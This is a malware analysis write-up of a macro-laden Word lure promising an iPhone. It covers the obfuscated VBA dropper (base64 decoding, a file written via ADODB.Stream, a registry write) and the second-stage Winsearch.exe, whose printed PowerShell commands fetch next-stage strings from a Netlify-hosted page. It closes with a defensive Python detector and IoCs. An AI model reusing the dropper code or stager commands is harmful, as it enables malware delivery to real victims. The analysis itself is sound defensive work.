WhisperGate Malware Analysis
Stage 1: b621c0e744c03b45c0b32f244a6b8b4a84c449ffde4a62e52d8acfdf6fac264a
Sample.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ABCD1980Ge@outlook[.]com, Template: Normal.dotm, Last Saved By: ABCD1980Ge@outlook[.]com, Revision Number: 21, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:33:00, Create Time/Date: Wed Jun 14 13:48:00 2023, Last Saved Time/Date: Wed Jun 14 16:08:00 2023, Number of Pages: 13, Number of Words: 4513, Number of Characters: 25727, Security: 0
The document is laid out like a form for a scam that promises the victim an iPhone 13 Pro; when the victim clicks the Apply button, the macro drops an executable.
The VBA code is heavily obfuscated, so instead of manually skimming through it we can run it through ViperMonkey, a VBA emulation tool, to recover what it does.
Highlights of the macro code (variable names such as qrst, abcdefgh, hij and abcdef hold the decoded ProgIDs and paths):
s = CreateObject(qrst).UserName
Set fso = CreateObject(abcdefgh)
' [...]
Exists1 = fso.FolderExists(hij)
On Error Resume Next
If Exists1 = True Then
' [...]
' the payload is reassembled from three chunks returned by a(), b() and c()
s1 = a()
On Error Resume Next
s2 = b()
On Error Resume Next
s3 = c()
svekbt = s1 + s2 + s3
' base64 decode via MSXML and write the binary out through ADODB.Stream (the dropped executable)
Set streamOutput = CreateObject("ADODB.Stream")
Set xmlDoc = CreateObject("Microsoft.XMLDOM")
Set xmlElem = xmlDoc.createElement("tmp")
xmlElem.dataType = "bin.base64"
streamOutput.Type = UseBinaryStreamType
streamOutput.Write xmlElem.nodeTypedValue
' registry write through a WScript.Shell-style RegWrite (key, value and type are obfuscated; likely persistence)
Set myWS = CreateObject(abcdef)
myWS.RegWrite i_tvrky, i_oledy, i_soper
' the form button is the trigger
Private Sub CommandButton1_Click()
    CoBFile
End Sub
Stage 2:
Winsearch.exe a4d7844280a7af693b468225e73496e2341faac96db6bc5194e58e22e2bf3413
This second-stage binary spawns cmd.exe and runs the following PowerShell commands. Each one forces TLS 1.2, fetches a page from a Netlify-hosted site with wget (Invoke-WebRequest), takes 15 characters starting at offset 19 of the response body, and strips everything up to the last '=' and everything from the first 'A' onward, so the next-stage string is carved out of an otherwise innocuous-looking page:
cmd 1
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello1.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 2
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello2.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 3
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello2.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 4
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello2.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 5
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello1.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
cmd 6
C:\WINDOWS\system32\cmd.exe /c powershell -command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (wget 'https://golden-starship-baec18.netlify.app/hello2.html' -UseBasicParsing).content.substring(19,15) -replace '.*=' -replace 'A.*'
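As an added defender-side example (not part of the original write-up), a small Python detector that flags the two behaviours described above, Office spawning an executable from a user-writable path and cmd.exe/PowerShell carving a string out of fetched web content, over constructed process-creation events. The event field names and file paths are assumed; the host name is the one seen in the stage-2 commands.

```python
import re

# Host contacted by the stage-2 PowerShell commands in the write-up.
STAGER_HOST = "golden-starship-baec18.netlify.app"

# Constructed Sysmon Event ID 1 style records, not real telemetry.
# Event 0 mirrors the stage-2 command line; event 1 is the Word-to-dropper launch.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\victim\AppData\Local\Temp\Winsearch.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r"C:\WINDOWS\system32\cmd.exe /c powershell -command "
                    r"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; "
                    r"(wget 'https://golden-starship-baec18.netlify.app/hello1.html' -UseBasicParsing)"
                    r".content.substring(19,15) -replace '.*=' -replace 'A.*'"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Users\victim\AppData\Local\Temp\Winsearch.exe",
     "CommandLine": r"C:\Users\victim\AppData\Local\Temp\Winsearch.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -command Get-Date"},
]

OFFICE_PARENT = re.compile(r"\\(winword|excel|powerpnt)\.exe$", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.I)
WEB_FETCH = re.compile(r"\b(wget|iwr|curl|invoke-webrequest)\b", re.I)
CONTENT_CARVE = re.compile(r"\.content\.substring\(", re.I)


def flag_event(ev):
    """Return the list of rule names an event matches (empty list if benign)."""
    hits = []
    cmd = ev.get("CommandLine", "")
    # Rule 1: web fetch whose response body is sliced into a string (stager pattern above).
    if WEB_FETCH.search(cmd) and CONTENT_CARVE.search(cmd):
        hits.append("powershell_web_content_carving")
    # Rule 2: direct match on the known stager host.
    if STAGER_HOST in cmd.lower():
        hits.append("known_stager_host")
    # Rule 3: an Office application launching a binary from a user-writable location.
    if OFFICE_PARENT.search(ev.get("ParentImage", "")) and USER_WRITABLE.search(ev.get("Image", "")):
        hits.append("office_spawns_exe_from_user_path")
    return hits


def scan(events):
    """Map event index to matched rules, keeping only events that matched something."""
    return {i: flag_event(ev) for i, ev in enumerate(events) if flag_event(ev)}
```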
IoCs (network addresses observed during execution)
35.156.224.161 34.159.132.250 34.159.25.198 3.72.140.173 35.198.80.163 18.192.231.252 224.0.0.252 239.255.255.250 3.72.140.173 34.159.25.198 18.192.231.252
Note that 224.0.0.252 (LLMNR) and 239.255.255.250 (SSDP) are local multicast addresses generated by normal Windows name-resolution and discovery traffic, not attacker infrastructure, and the remaining addresses belong to shared cloud hosting behind the Netlify site, so the netlify.app host name in the stage-2 commands is the more durable indicator than any single IP.